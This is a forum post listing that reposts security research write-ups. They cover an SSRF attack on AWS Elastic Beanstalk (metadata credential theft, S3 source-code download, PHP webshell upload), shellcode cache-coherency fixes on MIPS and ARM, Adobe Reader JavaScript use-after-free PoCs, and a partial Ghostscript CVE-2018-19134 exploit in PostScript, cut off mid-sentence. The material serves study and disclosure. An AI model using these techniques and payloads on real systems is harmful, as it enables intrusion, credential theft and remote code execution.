Jump to content

Nytro

Administrators
  • Posts

    18777
  • Joined

  • Last visited

  • Days Won

    732

Everything posted by Nytro

  1. Exploiting SSRF in AWS Elastic Beanstalk February 1, 2019 In this blog, Sunil Yadav, our lead trainer for “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on the application deployed on AWS Elastic Beanstalk with Continuous Deployment (CD) pipeline. AWS Elastic Beanstalk AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring. Provisioning an Environment AWS Elastic Beanstalk supports Web Server and Worker environment provisioning. Web Server environment – Typically suited to run a web application or web APIs. Worker Environment – Suited for background jobs, long-running processes. A new application can be configured by providing some information about the application, environment and uploading application code in the zip or war files. Figure 1: Creating an Elastic Beanstalk Environment When a new environment is provisioned, AWS creates an S3 Storage bucket, Security Group, an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions. When the code is deployed from the user computer, a copy of the source code in the zip file is placed in the S3 bucket named elasticbeanstalk–region-account-id. Figure 2: Amazon S3 buckets Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users). Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html Managed Policies for default Instance Profile – aws-elasticbeanstalk-ec2-role: AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray. AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks. AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks. Policy “AWSElasticBeanstalkWebTier” allows limited List, Read and Write permissions on the S3 Buckets. Buckets are accessible only if bucket name starts with “elasticbeanstalk-”, and recursive access is also granted. Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier” Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html Analysis While we were continuing with our regular pentest, we came across an occurrence of Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS Call to an external domain and this was further verified by accessing the “http://localhost/server-status” which was configured to only allow localhost to access it as shown in the Figure 4 below. http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status Figure 4: Confirming SSRF by accessing the restricted page Once SSRF was confirmed, we then moved towards confirming that the service provider is Amazon through server fingerprinting using services such as https://ipinfo.io. Thereafter, we tried querying AWS metadata through multiple endpoints, such as: http://169.254.169.254/latest/dynamic/instance-identity/document http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role We retrieved the account ID and Region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”: Figure 5: AWS Metadata – Retrieving the Account ID and Region We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role”: Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token Note: The IAM security credential of “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk. We further configured AWS Command Line Interface(CLI), as shown in Figure 7: Figure 7: Configuring AWS Command Line Interface The output of “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8: Figure 8: AWS CLI Output : get-caller-identity So, so far, so good. Pretty standard SSRF exploit, right? This is where it got interesting….. Let’s explore further possibilities Initially, we tried running multiple commands using AWS CLI to retrieve information from the AWS instance. However, access to most of the commands were denied due to the security policy in place, as shown in Figure 9 below: Figure 9: Access denied on ListBuckets operation We also know that the managed policy “AWSElasticBeanstalkWebTier” only allows to access S3 buckets whose name start with “elasticbeanstalk”: So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id. We found out the bucket name using the information retrieved earlier, as shown in Figure 4. Region: us-east-2 Account ID: 69XXXXXXXX79 Now, the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”. We listed bucket resources for bucket “elasticbeanstalk-us-east-2-69XXXXXXXX79” in a recursive manner using AWS CLI: aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ Figure 10: Listing S3 Bucket for Elastic Beanstalk We got access to the source code by downloading S3 resources recursively as shown in Figure 11. aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata –recursive Figure 11: Recursively copy all S3 Bucket Data Pivoting from SSRF to RCE Now that we had permissions to add an object to an S3 bucket, we uploaded a PHP file (webshell101.php inside the zip file) through AWS CLI in the S3 bucket to explore the possibilities of remote code execution, but it didn’t work as updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13: Figure 12: Uploading a webshell through AWS CLI in the S3 bucket Figure 13: 404 Error page for Web Shell in the current environment We took this to our lab to explore on some potential exploitation scenarios where this issue could lead us to an RCE. Potential scenarios were: Using CI/CD AWS CodePipeline Rebuilding the existing environment Cloning from an existing environment Creating a new environment with S3 bucket URL Using CI/CD AWS CodePipeline: AWS CodePipeline is a CI/CD service which builds, tests and deploys code every time there is a change in code (based on the policy). The Pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source provider and multiple deployment providers including Elastic Beanstalk. The AWS official blog on how this works can be found here: The software release, in case of our application, is automated using AWS Pipeline, S3 bucket as a source repository and Elastic Beanstalk as a deployment provider. Let’s first create a pipeline, as seen in Figure 14: Figure 14: Pipeline settings Select S3 bucket as source provider, S3 bucket name and enter the object key, as shown in Figure 15: Figure 15: Add source stage Configure a build provider or skip build stage as shown in Figure 16: Figure 16: Skip build stage Add a deploy provider as Amazon Elastic Beanstalk and select an application created with Elastic Beanstalk, as shown in Figure 17: Figure 17: Add deploy provider A new pipeline is created as shown below in Figure 18: Figure 18: New Pipeline created successfully Now, it’s time to upload a new file (webshell) in the S3 bucket to execute system level commands as show in Figure 19: Figure 19: PHP webshell Add the file in the object configured in the source provider as shown in Figure 20: Figure 20: Add webshell in the object Upload an archive file to S3 bucket using the AWS CLI command, as shown in Figure 21: Figure 21: Cope webshell in S3 bucket aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/ The moment the new file is updated, CodePipeline immediately starts the build process and if everything is OK, it will deploy the code on the Elastic Beanstalk environment, as shown in Figure 22: Figure 22: Pipeline Triggered Once the pipeline is completed, we can then access the web shell and execute arbitrary commands to the system, as shown in Figure 23. Figure 23: Running system level commands And here we got a successful RCE! Rebuilding the existing environment: Rebuilding an environment terminates all of its resources, remove them and create new resources. So in this scenario, it will deploy the latest available source code from the S3 bucket. The latest source code contains the web shell which gets deployed, as shown in Figure 24. Figure 24: Rebuilding the existing environment Once the rebuilding process is successfully completed, we can access our webshell and run system level commands on the EC2 instance, as shown in figure 25: Figure 25: Running system level commands from webshell101.php Cloning from the existing environment: If the application owner clones the environment, it again takes code from the S3 bucket which will deploy the application with a web shell. Cloning environment process is shown in Figure 26: Figure 26: Cloning from an existing Environment Creating a new environment: While creating a new environment, AWS provides two options to deploy code, one for uploading an archive file directly and another to select an existing archive file from the S3 bucket. By selecting the S3 bucket option and providing an S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell which gets deployed. References: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-welcome.html https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb https://ipinfo.io <BH Marketing> Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open. </BH Marketing> Sursa: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
      • 2
      • Upvote
  2. Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM 2/5/2019 gdb showing nonsensical crashes To set the scene: You found a stack buffer overflow, wrote your shellcode to an executable heap or stack, and used your overflow to direct the instruction pointer to the address of your shellcode. Yet your shellcode is inconsistent, crashes frequently, and core dumps show the processor jumped to an address halfway through your shellcode, seemingly without executing the first half. The symptoms haven’t helped diagnose the problem, they’ve left you more confused. You’ve tried everything. Changing the size of the buffer, page aligning your code, even waiting extra cycles, but your code is still broken. When you turn on debug mode for the target process, or step through with a debugger, it works perfectly, but that isn’t good enough. Your code doesn’t self-modify, so you shouldn’t have to worry about cache coherency, right? We accessed a root console via UART That’s what happened to us on MIPS when we exploited a TP-Link router. In order to save time, we added a series of NOPs from the beginning of the shellcode buffer to where the processor often “jumped,” and put the issue in the queue to explore later. We encountered a similar problem on ARM when we exploited Devil’s Ivy on an ARM chip. We circumvented the problem by not using self-modifying shellcode, and logged the issue so we could follow up later. Since we finished exploring lateral attacks, the research team has taken some time to dig into the shellcoding oddities that puzzled us earlier, and we’d like to share what we've learned. MIPS: A Short Explanation and Solution Overview of MIPS caches Our MIPS shellcode did not self-modify, but it ran afoul of cache coherency anyway. MIPS maintains two caches, a data cache and an instruction cache. These caches are designed to increase the speed of memory access by conducting reads and writes to main memory asynchronously. The caches are completely separate, MIPS writes data to the data cache and instructions to the instruction cache. To save time, the running process pulls instructions and data from the caches rather than from main memory. When a value is not available from the cache, the processor syncs the cache with main memory before the process tries again. When the TP-Link’s MIPS processor wrote our shellcode to the executable heap it only wrote the shellcode to the data cache, not to main memory. Modified areas in the data cache are marked for later syncing with main memory. However, although the heap was marked executable, the processor didn’t automatically recognize our bytes as code and never updated the instruction cache with our new values. What’s more, even if the instruction cache synced with main memory before our code ran, it still wouldn’t have received our values because they had not yet been written from the data cache to main memory. Before our shellcode could run, it needed to move from the data cache to the instruction cache, by way of main memory, and that wasn't happening. This explained the strange crashes. After our stack buffer overflow overwrote the stored return address with our shellcode address, the processor directed execution to the correct location because the return address was data. However, it executed the old instructions that still occupied the instruction cache, rather than the ones we had recently written to the data cache. The buffer had previously been filled mostly by zeros, which MIPS interprets as NOPs. Core dumps showed an apparent “jump” to the middle of our shellcode because the processor loaded our values just before, or during, generating the core dump. The processor hadn't synced because it assumed that the instructions that had been at that location would still be at that location, a reasonable assumption given that code does not usually change mid-execution. There are legitimate reasons for modifying code (most importantly, every time a new process loads), so chip manufacturers generally provide ways to flush the data and instruction cache. One easy way to cause a data cache write to main memory is to call sleep(), a well known strategy which causes the processor to suspend operation for a specified period of time. Originally our ROP chain only consisted of two addresses, one to calculate the address of the shellcode buffer from two registers we controlled on the stack, and the next to jump to the calculated address. To call sleep() we inserted two addresses before the original ROP chain. The first code snippet set $a0 to 1. $a0 is the first argument to sleep and tells the processor how many milliseconds to sleep. This code also loaded the registers $ra and $s0 from the stack, returning to the value we placed on the stack for $ra. Setting up call to sleep() The next code snippet called sleep(). Since sleep() returned to the return address passed into the function, we needed the return address to be something we controlled. We found a location that loaded the return address from the stack and then jumped to a register. We were pleased to find the code snippet below, which transfers the value in $s1, which we set to sleep(), into $t9 and then calls $t9 after loading $ra from the stack. Calling sleep() From there, we executed the rest of the ROP chain and finally achieved consistent execution of our exploit. Read on for more details about syncing the MIPS cache and why calling sleep() works or scroll down for a discussion of ARM cache coherency problems. In Depth on MIPS Caching Most of the time when we talk about syncing data, we're trying to avoid race conditions between two entities sharing a data buffer. That is, at a high level, the problem we encountered, essentially a race condition between syncing our shellcode and executing it. If syncing won, the code would work, if execution won, it would fail. Because the caches do not sync frequently, as syncing is a time consuming process, we almost always lost this race. According to the MIPS Software Training materials (PDF) on caches, whenever we write instructions that the OS would normally write, we need to make the data cache and main memory coherent and then mark the area containing the old instructions in the instruction cache invalid, which is what the OS does every time it loads a new process into memory. The data and instruction caches store between 8 and 64KBs of values, depending on the MIPS processor. The instruction cache will sync with main memory if the processor encounters a syncing instruction, execution is directed to a location outside the bounds of what is stored in the instruction cache, and after cache initialization. With a jump to the heap from a library more than a page away, we can be fairly certain that the values there will not be in the instruction cache, but we still need to write the data cache to main memory. We learned from devttys0 that sleep() would sync the caches. We tried it out and our shellcode worked! We also learned about another option from emaze, calling cacheflush() from libc will more precisely flush the area of memory that you require. However, it requires the address, number of bytes, and cache to be flushed, which is difficult from ROP. Because calling sleep(), with its single argument, was far easier, we dug a little deeper to find out why it's so effective. During sleep, a process or thread gives up its allotted time and yields execution to the next scheduled process. However, a context switch on MIPS does not necessitate a cache flush. On older chips it may, but on modern MIPS instruction cache architectures, cached addresses are tagged with an ID corresponding to the process they belong to, resulting in those addresses staying in cache rather than slowing down the context switch process any further. Without these IDs, the processor would have to sync the caches during every context switch, which would make context switching even more expensive. So how did sleep() trigger a data cache write back to main memory? The two ways data caches are designed to write to main memory are write-back and write-through. Write-through means every memory modification triggers a write out to main memory and the appropriate cache. This ensures data from the cache will not be lost, but greatly slows down processing speed. The other method is write-back, where data is written only to the copy in the cache, and the subsequent write to main memory is postponed for an optimal time. MIPS uses the write-back method (if it didn’t, we wouldn’t have these problems) so we need to wait until the blocks of memory in the cache containing the modified values are written to main memory. This can be triggered a few different ways. One trigger is any Direct Memory Access (DMA) . Because the processor needs to ensure that the correct bytes are in memory before access occurs, it syncs the data cache with main memory to complete any pending writes to the selected memory. Another trigger is when the data cache requires the cache blocks containing modified values for new memory. As noted before, the data cache size is at least 8KB, large enough that this should rarely happen. However, during a context switch, if the data cache requires enough new memory that it needs in-use blocks, it will trigger a write-back of modified data, moving our shellcode from the data cache to main memory. As before, when the sleeping process woke, it caused an instruction cache miss when directing execution to our shellcode, because the address of the shellcode was far from where the processor expected to execute next. This time, our shellcode was in main memory, ready to be loaded into the instruction cache and executed. Wait, Isn't This a Problem on ARM Too? It sure is. ARM maintains separate data and instruction caches too. The difference is we’re far less likely to find executable heaps and stacks (which was the default on MIPS toolchains until recently). The lack of executable space ready for shellcode forces us to allocate a new buffer, copy our shellcode to it, mark it executable, and then jump to it. Using mprotect to mark a buffer executable triggers a cache flush, according to the Android Hacker’s Handbook. The section also includes an important and very helpful note. Excerpt from Chapter 9, Separate Code and Instruction Cache, "Android Hackers Handbook" However there are still times we need to sync the instruction cache on ARM, as in the case of exploiting Devil’s Ivy. We put together a ROP chain that gave us code execution and wrote self-modifying shellcode that decoded itself in place because incoming data was heavily filtered. Although we included code that we thought would sync the instruction cache, the code crashed in the strangest ways. Again, the symptoms were not even close to what we expected. We saw the processor raise a segfault while executing a perfectly good piece of shellcode, a missed register write that caused an incomprehensible crash ten lines of code later, and a socket that connected but would not transmit data. Worse yet, when we attached gdb and went through the code step by step, it worked perfectly. There was no behavior that pointed to an instruction cache issue, and nothing easy to search for help on, other than “Why isn’t my perfectly good shellcode working!?” By now you can guess what the problem was, and we did too. If you are on ARMv7 or newer and running into odd problems, one solution is to execute data barrier and instruction cache sync instructions after you write but before you execute your new bytes, as shown below. ARMv7+ cache syncing instructions On ARMv6, instead of DSB and ISB, ARM provided MCR instructions to manipulate the cache. The following instructions have the same effect as DSB and ISB above, though prior to ARMv6 they were privileged and so won't work on older chips. ARMv6 cache syncing instructions Shellcode to call sleep() If you are too restricted by a filter to execute these instructions, as we were, neither of these solutions will work. While there are rumors about using SWI 0x9F0002 and overwriting the call number because the system interprets it as data, this method did not work for us and so we can’t recommend it (but feel free to let us know if you tried it and it worked for you). One thing we could do is call mprotect() from libc on the modified shellcode, but an even easier thing is to call sleep() just like we did on MIPS. We ran a series of experiments and determined that calling sleep() caused the caches to sync on ARMv6. Our shellcode was limited by a filter, so, although we were executing shellcode at this point, we took advantage of functions in libc. We found the address of sleep, but its lower byte was below the threshold of the filter. We added 0x20 to the address (the lowest byte allowed) to pass it through the filter and subtracted it with our shellcode, as shown to the right. Although context switches don't directly cause cache invalidation, we suspect that the next process to execute often uses enough of the instruction cache that it requires blocks belonging to the sleeping process. The technique worked well on this processor and platform, but if it doesn’t work for you, we recommend using mprotect() for higher certainty. Conclusion The way systems work in theory is not necessarily what happens in the real world. While chips have been designed to prevent additional overhead during context switches, no system runs in precisely the way it was intended. We had fun digging into these issues. Diagnosing computer problems reminds us how difficult it can be to diagnose health conditions. Symptoms show up in a different location than their cause, like pain referred from one part of the leg to another, and simply observing the problem can change its behavior. Embedded devices were designed to be black boxes, telling us nothing and quietly going about the one task they were designed to do. With more insight into their behavior, we can begin to solve the security problems that confound us. Just getting started in security? Check out the recent video series on the fundamentals of device security. Old hand? Try our team's research on lateral attacks, the vulnerability our ARM work was based on, and the MIPS-based router vulnerability. Sursa: https://blog.senr.io/blog/why-is-my-perfectly-good-shellcode-not-working-cache-coherency-on-mips-and-arm
      • 1
      • Upvote
  3. Using the Weblinks API to Reach JavaScript UAFs in Adobe Reader February 06, 2019 | Abdul-Aziz Hariri JavaScript vulnerabilities in Adobe Acrobat/Reader are getting fewer and fewer. I credit this to the “boom” that happened back in 2015 and 2016. Back then, a lot of Adobe Acrobat research emerged ranging from JavaScript API bypasses to the classic memory corruption style vulnerabilities (i.e. Use-After-Free, Type Confusions, Heap/Stack Overflows, etc.). In fact, in 2015, ZDI disclosed 97 vulnerabilities affecting Adobe Acrobat/Reader with almost 90% of the 97 vulnerabilities affecting the JavaScript API. 2016 had a slight increase totaling 110 vulnerabilities with almost the same percentage of JavaScript vulnerabilities. Most of the vulnerabilities targeted non-privileged JavaScript APIs. For those who are not familiar with Adobe Acrobat/Reader’s JavaScript API, the first thing you should know is that the JavaScript engine is a fork of Mozilla’s SpiderMonkey. Second, Adobe has a similar privileges architecture as SpiderMonkey. There are two privilege contexts: Privileged and Non-Privileged. This in turn splits the JavaScript APIs also into two: Privileged APIs and Non-Privileged. That said, it’s worth noting that probably 90-95% of the corruption vulnerabilities affecting the JavaScript APIs over the past couple of years mainly targeted non-privileged APIs. That still leaves us with a huge sum of non-audited, non-fuzzed, non-touched privileged APIs. That’s perfectly understandable since auditing privileged APIs is more involved. It also requires a JavaScript Privileges API bypass vulnerability to trigger and weaponize them. In other words, it’s more expensive. Thus, most of the big numbers heard around public research on how someone found tens or hundreds of vulnerabilities in Acrobat/Reader are mostly (if not ALL) image parsing vulnerabilities. It’s smart, if you ask me, but if you think that makes you hardcore, then we’re waiting for you at Pwn2Own, with your favorite image parsing bug weaponized and all of your Adobe CVEs on the back of your T-shirt of course. Trolling aside, we do still get some JavaScript vulnerabilities every now and then. Slapping this.closeDoc into API’s for UAF’s does not work anymore as far as I can tell. Well, at least for non-privileged APIs. New JavaScript UAF’s have been a little bit more elegant though they still have the same logic. For example, ZDI-18-1393, ZDI-18-1391, and ZDI-18-1394. While all of the 3 vulnerabilities are Use-After-Free vulnerabilities, the logic is interesting. First, all of those are vulnerabilities that affected WebLinks. Links in Adobe Acrobat in general are handled inside the WebLinks.api plugin. There’s a set of JavaScript APIs exposed to handle links. For example, this.addLink API (where this is the Doc object) accepts two arguments and is used to add a new link to the specified page with the specified coordinates. Here’s a code example: Another API that is quite useful as it forces the Link object to be freed *wink* is the this.removeLinks API. As the name implies, it removes all the links on the specified page within the specified coordinates. Here’s its code example: So how do these APIs relate to the bugs I mentioned? Simple: Create a Link with addLink, force the Link to be freed with removeLinks, and finally re-use it somehow. Well, it’s not that simple but the logic is right for all of these bugs. Here’s a breakdown of the PoCs… ZDI-18-1393: The PoC defines an array. It then defines a getter for the first element. The getter’s callback function calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderColor attribute set to the array defined earlier. ZDI-18-1391: The PoC defines an object named “mode”. It then defines a custom toString function which calls a function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the highlightMode attribute set to the object defined earlier. ZDI-18-1394: The PoC defines a variable named “width”. It then defines a custom valueOf function that calls this.removeLinks to force any Link objects at a given coordinate to be freed. A link is then added using this.addLink with the borderWidth attribute set to the variable defined earlier. Conclusion Although a lot of the non-privileged API’s have been heavily audited, there still are different methods that can still yield good results. Don’t forget that there’s still a huge attack surface waiting to be audited underneath the privileged APIs. Regardless, some more ingredients are required to reach those APIs (API restrictions bypasses). Even that can be challenging to defeat with the recent restrictions mitigations that Adobe rolled into Acrobat/Reader. That’s it for today folks. Until next time, you can find me on Twitter at @AbdHariri, and follow the team for the latest in exploit techniques and security patches. Sursa:https://www.zerodayinitiative.com/blog/2019/2/6/using-the-weblinks-api-to-reach-javascript-uafs-in-adobe-reader
  4. Exploiting CVE-2018-19134: remote code execution through type confusion in Ghostscript February 05, 2019 Posted by Man Yue Mo In this post I'll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you'd like to know more about how I used our QL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post. The vulnerability Let's first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s). struct ref_s { struct tas_s tas; union v { ps_int intval; ... uint64_t dummy; } value; }; This is a 16 byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for array, string, dictionary, etc.: struct tas_s { ushort type_attrs; ushort _pad; uint32_t rsize; }; The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t. static int zsetcolor(i_ctx_t * i_ctx_p) { ... if ((n_comps = cs_num_components(pcs)) < 0) { n_comps = -n_comps; if (r_has_type(op, t_dictionary)) { ref *pImpl, pPatInst; if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0) return code; if (code > 0) { code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy if (code < 0) return code; cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?! n_numeric_comps = ( pattern_instance_uses_base_space(cc.pattern) ? n_comps - 1 : 0); Here, r_ptr is a macro in iref.h: #define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct)) The value of pstruct originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41. << /Implementation [16#41] >> setpattern Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer: pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst) { return pinst->type->procs.uses_base_space( pinst->type->procs.get_pattern(pinst) ); } So it looks like I may be able to control a number of function pointers: get_pattern, uses_base_space, and pinst. Creating a fake object Let's see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control: In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs and pad in tas completely); green indicates the data that I have complete control of. The crucial point here is that, both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays: GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern This sets pinst to the array [16#41 [16#51 16#52]] and results in: This shows I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution? 8 bytes off an easy exploit I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator. As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by getting the operators off the systemdict by their name: GS>systemdict /put get == GS>--put-- So let's try to put some built-in functions in our fake array: /arr 100 array def systemdict /put get arr exch 1 exch put systemdict /get get arr exch 0 exch put <</Implementation [[16#41 arr]] >> setpattern I'll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may exist a better way of achieving that, but keep in mind that I've never written a line of PostScript before I found these vulnerabilities, so please bear with me. Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern: So I can now call functions that I could already call from PostScript anyway, so what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (alias of gs_context_state_s — they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions: struct gs_context_state_s { ... bool LockFilePermissions; /* accessed from userparams */ ... /* Put the stacks at the end to minimize other offsets. */ dict_stack_t dict_stack; exec_stack_t exec_stack; op_stack_t op_stack; struct i_plugin_holder_s *plugin_list; }; When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we'll be able to call functions as if Ghostscript is running without -dSAFER mode switched on. So let's try to create a PostScript array to fake the context i_ctx_t object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the argument. In order to call PostScript functions with a fake context, I'll need to control p. The offset from p to the i_ctx_p here is actually the same as the offset of op_stack, which is 0x270. As each ref is of size 0x10, this corresponds to the 39th element in the fake reference array: As seen from the diagram, this alignment is not ideal. The op_stack.stack.p corresponds to the tas part of my array, which I don't control completely. If only op_stack corresponded to a value field of a ref, then I would have succeeded. What's more, tas stores meta data of a ref, so even if I have full control of it, I won't be able to set it to the address of an arbitrary object without first knowing its address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper. Getting arbitrary read and write primitives The idea now is to find a PostScript function that: Does not dereference the osp (op_stack.stack.p) pointer; Still does something "useful" to osp; Is available in SAFER mode. Stack operators come to mind. The pop operator is particularly interesting: zpop(i_ctx_t *i_ctx_p) { os_ptr op = osp; check_op(1); pop(1); return 0; } It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If it is greater than osbot, then decreases the value of osp. It is a simple function that does not dereference osp, and it changes its value. To see what I can gain from this, let's take a closer look at the structure of ref and op_stack side by side: Recall that in our fake object, op_stack is faked by the 39th element of a ref array, which is a ref. As you can see in the image above, the field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _padd and rsize combined to form the the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice! One catch though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, will combine with others to give something that is greater than the pointer address of most ref objects. This prevents me from just modifying the accessibility of built-in read only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do: I can "convert" an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte of the same length). This allows me to read/write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of length specified by rsize, so any byte can be read/write from the byte buffer. Note that this does not give me any out-of-bound (OOB) read/write as the resulted string will have the same length as the original array, but since each ref is of 16 bytes, the resulting byte buffer will only cover about 1/16 of the original allocated buffer for the ref array. This is what I'm going to do with the exploit. I can of course do it the other way round and "convert" a string into an array of the same length. As explained above, the resulting ref array will be about 16 times larger than the original string array, which allows me to do OOB read and write. I have not pursued this route. There is one more technical difficulty that I need to overcome. The fake object, pinst actually calls two functions, with the output of one feeding into another: return pinst->type->procs.uses_base_space( pinst->type->procs.get_pattern(pinst) ); As seen from above, use_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst) as an input. As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn't even use the context pointer i_ctx_p at all. If only there exists a query language I could use to find particular patterns in a code base! Here's the QL query I used to find the operator I was looking for: from Function f where f.getName().matches("z%") and f.getFile().getAbsolutePath().matches("%/psi/%") and // Look for functions with a single parameter of the right type: f.getNumberOfParameters() = 1 and f.getParameter(0).getType().hasName("i_ctx_t *") and // Make sure the function is actually defined: exists(Stmt stmt | stmt.getEnclosingFunction() = f) and // And doesn't access `i_ctx_p` not exists(FieldAccess fa, Function f2 | fa.getQualifier().getType().hasName("i_ctx_t *") and fa.getEnclosingFunction() = f2 and f.calls*(f2) ) // And doesn't dereference `i_ctx_p` and not exists(PointerDereferenceExpr expr, Variable v, Function f2 | expr.getAnOperand() = v.getAnAccess() and v.getType().hasName("i_ctx_t *") and expr.getEnclosingFunction() = f2 and f.calls*(f2) ) select f My QL query uses some heuristics to identify PostScript operators. Their names normally start with z and are defined inside the psi directory. Also they they take an argument of type i_ctx_t *. I then look for functions that do not dereference the argument nor access its fields, either in itself or in functions that it calls. This query does not look for dereferences of the parameter i_ctx_p particularly, but just any variable of type i_ctx_t *, which is a good enough approximation. You can run your own QL queries on over 130,000 GitHub,Bitbucket, and GitLab projects at LGTM.com. You can use either the online query console, or you can install the QL for Eclipse plugin and run queries locally on a code snapshot (downloadable from the repo's project page on LGTM). Ghostscript is not developed on GitHub, Bitbucket, or GitLab, so it has not been analyzed by LGTM.com. But you can download a Ghostscript code snapshot here. This query gives me 6 results: The function ucache seems to be just what we need. Let's try to put this together and see if it works. First set up the fake object pinst: %Create the fake array pinst /pinst 100 array def %array that stores the pop-ucache gadget /pop_ucache 100 array def %put pop into pop_ucache to cause more type confusions by decrementing osp systemdict /pop get pop_ucache exch 1 exch put %put ucache in (no op) to avoid crash systemdict /ucache get pop_ucache exch 0 exch put %replace the functions with pop and ucache pinst 1 pop_ucache put Now we need to create a large array object and store it in the 39th element of pinst. It's metadata tas will then be interpreted as the stack pointer address osp. I'll use the PostScript operator put as its first element, then use pop 